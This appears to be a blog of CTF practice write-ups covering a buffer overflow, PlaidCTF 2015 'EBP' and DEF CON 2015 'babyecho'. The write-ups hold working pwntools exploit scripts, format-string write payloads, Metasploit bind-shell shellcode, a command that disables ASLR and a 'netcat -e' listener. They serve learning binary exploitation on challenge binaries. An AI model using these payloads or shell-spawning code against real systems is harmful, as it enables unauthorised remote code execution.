bffb:ed50|08048604|....|return to 08048604
bffb:ed54|08048618|....|return to 08048618
bffb:ed58|0804862c|,...|return to 0804862c
bffb:ed5c|08048640|@...|return to 08048640
bffb:ed60|08048654|T...|return to 08048654
bffb:ed64|08048668|h...|return to 08048668
bffb:ed68|0804867c||...|return to 0804867c
bffb:ed6c|08048690|....|return to 08048690
bffb:ed70|080486a4|....|return to 080486a4
bffb:ed74|080486b8|....|return to 080486b8
bffb:ed78|696b696b|kiki|
bffb:ed7c|0804000a|....|
bffb:ed80|00000001|....|
bffb:ed84|bffbee54|T...|
bffb:ed88|bffbee5c|\...|
bffb:ed8c|bffbeda8|....|
bffb:ed90|b764c515|..d.|return to b764c515

Great! But the stack is non-executable, so how do we use this buffer overflow to gain code execution, execute our shellcode and gain shell access so we can find the flag on the remote system? Well... we don't! Turns out we don't really need to go to all the trouble of finding a valid r0p chain for our payload since we already have a piece of code which will print the flag for use (remember the hidden function at 0x080486CC). We just need to redirect the flow of execution to that hidden function.

Luckily,we can overflow a bunch of return addresses, so redirecting the flow of execution should not be a problem. To speed things up, I'll use a neat little trick to see which return address we need to overflow.

First, I'll use Metasploit's pattern_create function to create a unique pattern, and then use this pattern as the attack string.

# /usr/share/metasploit-framework/tools/pattern_create.rb 50
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab

The debugger reports a segmentation fault while trying to access the address 0x41326241, which means the sub-string we need to change is Ab2A. Which gives us the following attack string!
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1\xCC\x86\x04\x08b3Ab4Ab5Ab

So that was easy! :)

Here is a small python script to automate all this.
from pwn import *
from struct import pack, unpack

conn = remote("localhost", 6667)
log.info(conn.recvuntil(">"))

conn.sendline("kiki")  # send name

log.info(conn.recvuntil(">"))

conn.sendline("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1\xCC\x86\x04\x08b3Ab4Ab5Ab")  # send payload

log.info(conn.recvall())

conn.close()


Saturday, June 6, 2015

PlaidCTF CTF 2015 "EBP" - practice session write-up

This is another practice session write-up (disclaimer).
Today's challenge is called "EBP" and is from PlaidCTF CTF 2015.

You can download the ELF here.


Let's try the usual stuff first to see what we are dealing with...

# file ebp_a96f7231ab81e1b0d7fe24d660def25a.elf 
ebp_a96f7231ab81e1b0d7fe24d660def25a.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xf994804ecd68699809b56d85dbba1038de9f74b0, not stripped

# /opt/checksec.sh --file ebp_a96f7231ab81e1b0d7fe24d660def25a.elf 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   ebp_a96f7231ab81e1b0d7fe24d660def25a.elf

# strings ebp_a96f7231ab81e1b0d7fe24d660def25a.elf 
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
fflush
puts
stdin
fgets
stdout
__libc_start_main
snprintf
__gmon_start__
GLIBC_2.0
PTRh
QVhG
[^_]
;*2$"

Nothing special - the binary seems to be dynamically linked and was not stripped (which makes things easier). Also, it seems to have no stack protection - which could be a clue to what we are supposed to do.

Running the app, we don't see anything (no messages). After typing away aimlessly (and pressing enter) we see that the input is served back to us. This is obviously an echo app. It reminded me of the last writeup I did on babyecho, so I tried a few format strings to see if this was the same ... and sure enough it was (or at least looked like it was).

# python -c 'print "%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x"' | ./ebp_a96f7231ab81e1b0d7fe24d660def25a.elf 
b7684ada b7784440 0804a080 bfe10a48 0804852c 00000001 00000000 0804a080 b7783ff4 00000000 00000000 bfe10a68 08048557 0804a080 00000400 b7784440 b7783ff4

Obviously, we have some leakage! At that point I was thinking this was yet another format string where I just needed to learn the offset of the format string on the stack and get out my magic formula for writing any value to any location (like I did in this writeup). Let's fire up EDB and have a look!

Since the app is not stripped and dynamically built, we can easily get to the snprintf function since it is the most likely candidate for the format string vulnerability (looking at strings output, we see that snprintf is used). The call to snprintf is located at 0x0804851A, so this is a good place to put a breakpoint. After entering a bunch of A's, we get the following stack layout:

bfef:9b20|0804a480|....|
bfef:9b24|00000400|....|
bfef:9b28|0804a080|....|ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
bfef:9b2c|b7606ada|.j`.|return to b7606ada
bfef:9b30|b7706440|@dp.|
bfef:9b34|0804a080|....|ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
bfef:9b38|bfef9b58|X...|
bfef:9b3c|0804852c|,...|return to 0804852c       
bfef:9b40|00000001|....|
bfef:9b44|00000000|....|
bfef:9b48|0804a080|....|ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
bfef:9b4c|b7705ff4|._p.|
bfef:9b50|00000000|....|
bfef:9b54|00000000|....|
bfef:9b58|bfef9b78|x...|
bfef:9b5c|08048557|W...|return to 08048557
bfef:9b60|0804a080|....|ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
bfef:9b64|00000400|....|
bfef:9b68|b7706440|@dp.|
bfef:9b6c|b7705ff4|._p.|
bfef:9b70|08048580|....|
bfef:9b74|00000000|....|
bfef:9b78|bfef9bf8|....|
bfef:9b7c|b75bce46|F.[.|return to b75bce46
bfef:9b80|00000001|....|
bfef:9b84|bfef9c24|$...|
bfef:9b88|bfef9c2c|,...|
bfef:9b8c|b7725860|`Xr.|
bfef:9b90|b773e821|!.s.|return to b773e821
bfef:9b94|ffffffff|....|
bfef:9b98|b7746ff4|.ot.|
bfef:9b9c|080482b1|....|ASCII "__libc_start_main"
bfef:9ba0|00000001|....|
bfef:9ba4|bfef9be0|....|
bfef:9ba8|b7737c16|.|s.|return to b7737c16

So.. the location 0x0804a080 seems to be very popular. That's actually the location of the buffer holding our input. Hmm... wait a second - out input is not on the stack!!1! The tricks I used in the last writeup won't help since they require the input to be on the stack.

What does that mean? It means that we can only write to locations that are directly referenced on the stack! Our end goal should be to overwrite one of the return addresses on the stack with the location of our buffer (which is on the heap). But to achieve that, the address of the return address on stack has to be on the stack. For example, if we wanted to overwrite the return address 0xb75bce46 which is at 0xbfef9b7c - the address 0xbfef9b7c would have to be on the stack! Looking at the stack, we got no such luck as it seams the reference to the return address is nowhere to be found (if you think about it, that makes sense!).

Conclusion - our format string input is on the heap (no the stack), so we need to find another way to write to a memory location. At this point I started searching Google for heap based format strings and came across this paper. It explains a method of overwriting EBP and forcing it to direct the application flow to an attacker controlled space. To quote the paper: A generic way of controlling the execution flow is to overwrite the saved instruction pointer on the stack, so that an address is getting executed on a ret command that was chosen by an attacker.

Obviously, we need to take a look at the function calls in the application to determine the values on each function's stack frame. After a bit of reverse engineering... we get an idea how the app looks like:
int main()
{
  int result;

  while(1)
  {
    result = (int) fgets(buf, 1024, stdin);
    if ( !result )
      break;
    echo();
  }
  return result;
}

int echo()
{
  make_response();
  puts(response);
  return fflush(stdout);
}

int make_response()
{
  return snprintf(response, 0x400u, buf);
} 

Luckily, the app is very small so it's easy to see the function call looks like this: main -> echo -> make_response -> snprintf.

If you look at Fig 2 from the article I mentioned, it gives an example of such a situation. From the stack layout shown bellow and what we now about the function calls, we can map the various parts of the stack.

bfef:9b2c|b7606ada|.j`.|return to b7606ada           %1$x
bfef:9b30|b7706440|@dp.|                             %2$x  
bfef:9b34|0804a080|....|ASCII "AAAAAAAAAAAAAAAAA\n"  %3$x
bfef:9b38|bfef9b58|X...|                             %4$x  (EBP)
bfef:9b3c|0804852c|,...|return to 0804852c           %5$x  (return to echo)
bfef:9b40|00000001|....|                             %6$x
bfef:9b44|00000000|....|                             %7$x
bfef:9b48|0804a080|....|ASCII "AAAAAAAAAAAAAAAAA\n"  %8$x
bfef:9b4c|b7705ff4|._p.|                             %9$x
bfef:9b50|00000000|....|                             %10$x
bfef:9b54|00000000|....|                             %11$x
bfef:9b58|bfef9b78|x...|                             %12$x (EBP)
bfef:9b5c|08048557|W...|return to 08048557           %13$x (return to main)
bfef:9b60|0804a080|....|ASCII "AAAAAAAAAAAAAAAAA\n"  %14$x 

We see that at offset %4$x in the stack is where the EBP is stored, which points at the stack frame of the main method. By accessing %4$x we can write to the main methods EBP and write whatever value we want.With a bit of trial and error, I came to this value which successfully overwrites main's EBP with 0x0804a090.

AAAA%134520972u%4$nABCDEFGHIJKLMNOPRSTUVXZYAAAAAAAAAAAAAAAAAAAAAAAA
This set's the EIP value to the address 0x45444342, which corresponds to the string BCDE we appended in the above payload. We can now control the EIP!
With a few minor adaptations, the above string can be changed to point to our shellcode.

"AAAA" + "%134520972u%4$n" + "A"+ "\xa0" + "\xa0"+ "\x04" +"\x08" +"\x90"*30 + shellcode

Before putting it all together, I chose a classic shellcode to go with the payload, the shell_bind_tcp from Metasploit.
# msfpayload linux/x86/shell_bind_tcp C

unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

This is the final exploit script written in python using pwn library. Once the exploit is done, one can easily connect to the target via the NetCat tool on port 4444, and gain shell access.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

conn = remote("localhost", 6667)

payload = "AAAA" + "%134520972u%4$n" + "A"+ "\xa0" + "\xa0"+ "\x04" +"\x08" +"\x90"*30 + shellcode

log.info("Sending payload")
conn.sendline(payload)

msg = conn.recv()
print msg

conn.close()


Tuesday, June 2, 2015

DEF CON Qualifier 2015 "babyecho" - practice session write-up

Hello and welcome to another practice session write-up (disclaimer).
Today's challenge is called "babyecho" and is from DEF CON Qualifier 2015.

You can download the ELF here.

Looking at the output of file command, we see that the binary had been statically linked and stripped. This means it will have a huge amount of lib code and it will be hard to distinguish it from the actual "app" code.
# file ./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d
./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=0x8566a6c92bd79a1521b557d1e2855af0eef527e4, stripped

Loading the binary into IDA, we can see that there are in fact 1242 function ... going through that by hand should be fun!
Looking over the IDA PRO Book, I see that a full fledged PRO version of IDA has something called fling and flirt signatures which can help fingerprint functions in statically built binaries that come from commonly known libraries (and are built by most common compilers). Unfortunately, it seems that these signatures only come for windows system libraries and compilers. Which kind of makes sense seeing as how there are a million versions and sub-version of the same Linux library - same goes for compilers, and when you mix the two together... -.-'

OK - so we're probably not going to get anywhere by digging through the binary. Let's run it and see what it actually does!
./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d
Reading 13 bytes
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA
Reading 13 bytes
AAAAAAAAAAAA
Reading 13 bytes
AAAAAAAAAA
Reading 13 bytes

It seems the binary is reading an array of characters and is printing it back after chopping it to 13 bytes. Well that's cute! Obviously this is not a buffer overflow seeing as how we added more than 13 bytes, and no segmentation fault occurred.
Tinkering a bit with various inputs, it seems the binary is vulnerable to a format string attack. The string "%08x" prints the hex value of the next argument on the stack. Judging by the response, we can obviously leek some info from the stack.
# ./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d
Reading 13 bytes
%08x %08x %08x
0000000d 0000000a 
Reading 13 bytes
x
Reading 13 bytes

 At this point I became interested whether or not the binary had any protection mechanisms, so I used checksec. It's a really handy tool that print's out everything we need without having to use readelf and peek in a bunch of proc folders. It seems the binary really has no stack protection at all (hence the prefix "baby" I assume) :)

# /opt/checksec.sh --file babyecho_eb11fdf6e40236b1a37b7974c53b6c3d
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   babyecho_eb11fdf6e40236b1a37b7974c53b6c3d

To really understand where the vulnerability is and how it can be exploited, we need to peek under the hood. The problem is, it's really hard to find the function in charge of handling the user input since the binary has been statically linked. Fortunately, the string "Reading 13 bytes" is printed right before parsing our input, so let's try a dirty little trick to locate the needle in a haystack.

First we locate the string "Reading 13 bytes" in memory.
The string is in the data section at 0x080BE5F1.
The entry where the string resides seems to be referenced by a function at location 0x08048F3C+98. Here is a dump of that function.

.text:08048F3C                 push    ebp
.text:08048F3D                 mov     ebp, esp
.text:08048F3F                 and     esp, 0FFFFFFF0h
.text:08048F42                 sub     esp, 420h
.text:08048F48                 mov     eax, large gs:14h
.text:08048F4E                 mov     [esp+420h+var_4], eax
.text:08048F55                 xor     eax, eax
.text:08048F57                 lea     eax, [esp+420h+var_404]
.text:08048F5B                 mov     [esp+420h+var_40C], eax
.text:08048F5F                 mov     [esp+420h+var_408], 0
.text:08048F67                 mov     [esp+420h+var_410], 0Dh
.text:08048F6F                 mov     eax, off_80EA4C0
.text:08048F74                 mov     [esp+420h+var_414], 0
.text:08048F7C                 mov     [esp+420h+var_418], 2
.text:08048F84                 mov     [esp+420h+var_41C], 0
.text:08048F8C                 mov     [esp+420h+var_420], eax
.text:08048F8F                 call    loc_804FC40
.text:08048F94                 mov     [esp+420h+var_41C], offset sub_8048EB1
.text:08048F9C                 mov     [esp+420h+var_420], 0Eh
.text:08048FA3                 call    sub_804DE70
.text:08048FA8                 mov     [esp+420h+var_420], 14h
.text:08048FAF                 call    sub_806CB50
.text:08048FB4                 jmp     short loc_804902C
.text:08048FB6 ; ---------------------------------------------------------------------------
.text:08048FB6
.text:08048FB6 loc_8048FB6:                            ; CODE XREF: sub_8048F3C+F5 j
.text:08048FB6                 mov     eax, 3FFh
.text:08048FBB                 cmp     [esp+420h+var_410], 3FFh
.text:08048FC3                 cmovle  eax, [esp+420h+var_410]
.text:08048FC8                 mov     [esp+420h+var_410], eax
.text:08048FCC                 mov     eax, [esp+420h+var_410]
.text:08048FD0                 mov     [esp+420h+var_41C], eax
.text:08048FD4                 mov     [esp+420h+var_420], offset aReadingDBytes ; "Reading %d bytes\n"
.text:08048FDB                 call    sub_804F560
.text:08048FE0                 mov     [esp+420h+var_418], 0Ah
.text:08048FE8                 mov     eax, [esp+420h+var_410]
.text:08048FEC                 mov     [esp+420h+var_41C], eax
.text:08048FF0                 lea     eax, [esp+420h+var_404]
.text:08048FF4                 mov     [esp+420h+var_420], eax
.text:08048FF7                 call    sub_8048E24
.text:08048FFC                 lea     eax, [esp+420h+var_404]
.text:08049000                 mov     [esp+420h+var_420], eax
.text:08049003                 call    sub_8048ECF
.text:08049008                 lea     eax, [esp+420h+var_404]
.text:0804900C                 mov     [esp+420h+var_420], eax
.text:0804900F                 call    sub_804F560
.text:08049014                 mov     [esp+420h+var_420], 0Ah
.text:0804901B                 call    loc_804FDE0
.text:08049020                 mov     [esp+420h+var_420], 14h
.text:08049027                 call    sub_806CB50
.text:0804902C
.text:0804902C loc_804902C:                            ; CODE XREF: sub_8048F3C+78 j
.text:0804902C                 cmp     [esp+420h+var_408], 0
.text:08049031                 jz      short loc_8048FB6
.text:08049033                 mov     eax, 0
.text:08049038                 mov     edx, [esp+420h+var_4]
.text:0804903F                 xor     edx, large gs:14h
.text:08049046                 jz      short locret_804904D
.text:08049048                 call    sub_806F1F0
.text:0804904D
.text:0804904D locret_804904D:                         ; CODE XREF: sub_8048F3C+10A j
.text:0804904D                 leave
.text:0804904E                 retn



As we can see, the 13 byte limitation is pushed on to the stack (0Dh). It also seems that there is a hard-coded input size of 1023 bytes (3FFh), and that the input size is being compared to it. The function sub_804F560 is used at 08048FDB (where the "Reading 13 bytes" is being printed) and 0804900F (this seems like a good place to put a breakpoint and peek at the stack).
Being a visual guy (and missing Olly...), I use EDB to put a few breakpoints and see the stack layout after a few format string injections.
It seems that our input is located at 0xbffff5ac, and that format string "%08x %08x" retrieved the value 0000000d and 0000000a, which are directly bellow the pointer to the format string (as is usual with printf's). Playing around with various format strings, we notice that we can easily use direct parameter access-type format strings to get to the values that are on the stack. This is a short mapping of the stack and it's parameters after our input is ingested (copied from EDB stack trace).
bfff:f584|080481a8|....|
bfff:f588|bffff9b8|....|
bfff:f58c|08049014|....|return to 08049014     (the return address!!!1!)
bfff:f590|bffff5ac|....|ASCII "AAAAAAA"
bfff:f594|0000000d|....|                       %1$x
bfff:f598|0000000a|....|                       %2$x
bfff:f59c|00000000|....|                       %3$x
bfff:f5a0|0000000d|....|                       %4$x (seems to be the 13 byte limitation)
bfff:f5a4|bffff5ac|....|ASCII "AAAAAAA"        %5$x
bfff:f5a8|00000000|....|                       %6$x
bfff:f5ac|41414141|AAAA|                       %7$x
bfff:f5b0|00414141|AAA.|
bfff:f5b4|00000000|....|

Having played around with this binary in a debugger, I noticed that the stack addresses changed constantly (because of ASLR). At this point during the exploit development, this is kind of annoying so I decided to turn it off.
echo 0 > /proc/sys/kernel/randomize_va_space

OK - the hard part seems to be over. We now know what the stack looks like and know where our input (payload) is located. Also, we can easily leek the location of our payload with %5$x, making it easy to subvert ASLR on the server (remember, just because we killed it locally does not mean we can hard-code the virtual addresses in our exploit!).
Knowing this, it is easy to overwrite the return address (in above example at 0xbffff58c) with the address of our payload.

But wait - we can only write 13 bytes!!1! That's not enough space for a decent payload (at least not to my knowledge).

Luckily, we know that the 13 byte limitation parameter is located at %4$x. There is a dirty little trick we can use to change the value at %4$x (since it is bellow format string pointer) just enough to make it possible to upload a decent payload/shellcode. I found this little trick reading through this tutorial.
\xdc\xf0\xff\xbf%7$hn
The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number.
With the "%7$" parameter we increase the internal stack pointer of the format function. We do this until this pointer points to the beginning of our format string, which is at offset 7$. What $hn actually does is print the length of the current string in bytes (this is why we can only insert a small integer number). There is a neat little trick we can use to increase the length of the string without increasing the string length so drastically - %9u. So, our injection has to look something like this:
\xdc\xf0\xff\xbf%9u%7$hn
Because of the 13 byte restriction we only have 8 characters to set the length since %7$hn takes up 5 characters. Even with the %9u we wont get an integer higher than 13 (coincidence - probably not!). Obviously, we can't just overwrite the first byte at offset 5$ (0xbffff5a0 in above dump) since id is already higher then our max length (13). Thus, we have to overwrite one or two bytes higher (e.g. bffff5a2) .. which is not really a big deal to achieve.

Since any further steps depend on the actual leek, it makes no sense to try further format string injections by hand - we need to script! I use python as my tool of choice for most of my exploiting endeavors. There is a really nice library for python called pwn, which really helps in removing the boilerplate code from most exploit scripts. Hence, I will be using it for this challenge.

from pwn import *
conn = remote("localhost", 1234) # open connection to babyecho server
log.info(conn.recvuntil("\n"))   # get the first output 

conn.sendline("%5$x")            # inject format string to leek address
leak_str = p.recvuntil("\n")
leaked_buf_addr = int(leak_str, 16)

log.info("We got this address: %s" % hex(leaked_buf_addr))

For this to work locally, you obviously need to start your own local "babyecho server". I did it using netcat, like this:
nc -l -p 1234 -e ./babyecho_eb11fdf6e40236b1a37b7974c53b6c3d

Now that we got the address of the buffer on the stack, we can subtract 0xC (or 12) from that address to get the address of the buffer size limitation. Then, we increase the address by 2 so that we are not writing to the first byte, but the third!
addr_of_limitation = leaked_buf_addr - 12     # substract 0xC to get limitation address

addr_of_limitation = addr_of_limitation + 2   # don't write to the first byte 
                                              # because it will not be enough
conn.sendline(p32(addr_of_limitation + 2)+"%9u%7$hn") 
conn.recvuntil("\n")

We confirm this by looking at the stack after running this script. Here is a before and after:
bfff:f590|bffff5ac|....|ASCII "AAAAAAA"
bfff:f594|0000000d|....|                       %1$x
bfff:f598|0000000a|....|                       %2$x
bfff:f59c|00000000|....|                       %3$x
bfff:f5a0|0000000d|....|                       %4$x ==> bfff:f0d0|0007000d|....|
bfff:f5a4|bffff5ac|....|ASCII "AAAAAAA"        %5$x

Hurray! Our input is now larger than 13 bytes!!1! Please note that even though we now have a huge limitation value, we still have a hard-coded limitation of 1023 bytes (as shown before). That should be enough for a decent shellcode :)

Side-note: perhaps it is useful to point out a neat trick in EDB, which let's you attach to a running binary. Here is how I tested the above exploit:
  1. Start babyeacho using NetCat
  2. Attach EDB to the NC process (File -> Attach). It will probably be the last process in the list (named nc)
  3. Press run in EDB
  4. Execute python exploit script above
  5. EDB catches the input to NC and start executing babyecho, which allows us to set a breakpoint at 0x0804900f (right before we execute the injection and where we can see the stack layout)
  6. Verify stack layout and step over till you see the result :)
 So far so good - we now need to force the program to execute our shellcode (which we do not have yet) by jumping to it's location. Usually, when the payload is loaded on the stack it's bad luck because most processes have NX enabled. In that case one needs to play around with R0P. However, this is not one of those times since NX is not enabled! This means we can put our shellcode on the stack, and simply force the program to jump to that location. An obvious candidate would be the return address (0xbffff58c in above dump).
Now comes the somewhat tricky part - how do we write an arbitrary value to a location on the stack? The last trick won't work because it only enables us to write a short integer value. Well, turns out that there is actually a "magic formula" you can use to write any value to any location. I remember first seeing it in the book Gray Hat Hacking, but there is probably another instance of it out there.

First, we need to choose an value to write and an address to write it to! Then, the value we wish to write needs to be split in two values:
  • The first two, high-order, bytes (HOB)
  • The last two, lower-order, bytes (LOB)
The formula goes something like this:

HOB < LOBHOB > LOB
[addr_to_write_to][addr_to_write_to + 2] [addr_to_write_to][addr_to_write_to + 2]
%[LOB - 8] %[HOB - 8]
[param_offset_on_stack]$hn [param_offset_on_stack + 1]$hn
%[LOB - HOB]x %[HOB - LOB]x
[param_offset_on_stack + 1]$hn [param_offset_on_stack]$hn

param_offset_on_stack - in this scenario is 7 (as explained in the first stack dump!).

Now we need to choose the address to which we are going to write. Like I said earlier, we will leverage the return address location and redirect the flow of execution to our shellcode. So where is the return address? If you look at the previous stack dumps, you will see it right above the first parameter - which is 32 bytes above the leaked address.
As for the value to write (the address of our shellcode) - we could calculate it based on the table above.. but we could also just look at it live with EDB. To do this, I will extend the python script with the above formula (in the table) and use a dummy value (0xBBBBBBBB) to write to the return address. As for the payload, for now let's just send a bunch of A's and see where they land.
addr_to_write_to = buffer_address - 32
value_to_write = 0xBBBBBBBB

hob = hex((value_to_write >>16)& 0xFFFF)
lob = hex(value_to_write & 0xFFFF)

payload = ""
payload += str(p32(addr_to_write_to)) + str(p32(addr_to_write_to+2))

if hob < lob:
 payload += "%" + str(int(hob, 16)-8) 
 payload += "x%8$hn" 
 payload += "%" + str(int(lob,16)-int(hob,16))
 payload += "x%7$hn" 
else:
 payload += "%" + str(int(lob, 16)-8) 
 payload += "x%7$hn" 
 payload += "%" + str(int(hob,16)-int(lob,16))
 payload += "x%8$hn" 

payload += "A" *100 

p.sendline(payload)
p.interactive()

As we can see in the screenshot bellow, the payload begins at 0xbffff0fc, which is 32 bytes from the leaked address. Now we can change the value_to_write accordingly to land where our payload is.

Now that everything is in place, we just need to add the right shellcode at the end of the payload, and we are done! Instead of writing one ourselves, we'll just use a shellcode from Metasploit. I used msfpayload to search for a bind shell for 32 bit Linux systems.
# msfpayload -l | grep linux | grep shell | grep 86
[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************
    linux/x86/shell/bind_ipv6_tcp                       Spawn a command shell (staged). Listen for a connection over IPv6
    linux/x86/shell/bind_nonx_tcp                       Spawn a command shell (staged). Listen for a connection
    linux/x86/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection
    linux/x86/shell/find_tag                            Spawn a command shell (staged). Use an established connection
    linux/x86/shell/reverse_ipv6_tcp                    Spawn a command shell (staged). Connect back to attacker over IPv6
    linux/x86/shell/reverse_nonx_tcp                    Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell_bind_ipv6_tcp                       Listen for a connection over IPv6 and spawn a command shell
    linux/x86/shell_bind_tcp                            Listen for a connection and spawn a command shell
    linux/x86/shell_bind_tcp_random_port                
    linux/x86/shell_find_port                           Spawn a shell on an established connection
    linux/x86/shell_find_tag                            Spawn a shell on an established connection (proxy/nat safe)
    linux/x86/shell_reverse_tcp                         Connect back to attacker and spawn a command shell
    linux/x86/shell_reverse_tcp2                        Connect back to attacker and spawn a command shell


We have plenty to choose from! Since its for local user, I just picked a TCP bind shell.
# msfpayload linux/x86/shell/bind_tcp C

/*
 * linux/x86/shell/bind_tcp - 36 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] = 
"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b"
"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xcd\x80";

There we go - our shellcode. Now just paste it instead of the A's, and run the script - it will get you shell access on the host. All done!  :)


Practice session write-up - disclaimer


CTF's are fun!!1!

While taking pleasure in playing CTF's and solving challenges, I often find that I don't get to try out every CTF challenge and if I do, I usually just try to solve it as quickly and painlessly as possible to get the flag. So, in an attempt to improve my skills and play around with fun CTF challenges, I decided to start writing these blog posts to share what I learned, and possibly get feedback from others on how to improve.

For lack of a better term, I will be calling these write-ups "Practice session write-up" in order to distinguish them from write-ups of the tasks that I have solved while participating in a CTF.